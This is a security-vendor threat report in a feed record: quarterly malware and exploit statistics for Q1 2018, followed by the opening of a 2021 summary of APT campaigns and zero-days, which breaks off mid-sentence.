This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well as Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. 
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, which had held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. 
Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that it can only be compared to the number of Adobe Flash vulnerabilities found in the past. 
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. 
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). 
As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organization to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \n* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 28.0% \n2 | Nymaim | Trojan.Win32.Nymaim | 20.3% \n3 | Caphaw | Backdoor.Win32.Caphaw | 15.2% \n4 | SpyEye | Backdoor.Win32.SpyEye | 11.9% \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% \n6 | Emotet | Backdoor.Win32.Emotet | 2.4% \n7 | Neurevt | Trojan.Win32.Neurevt | 2.3% \n8 | Shiz | Backdoor.Win32.Shiz | 2.1% \n9 | Gozi | Trojan.Win32.Gozi | 1.9% \n10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. 
In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affiliate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. 
The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. 
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. 
Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112** attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). 
Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. 
Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. 
We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. 
Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. 
Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. 
This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. However, the bulk of the detected tools, besides Moriya, consists of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. 
This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. 
However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since 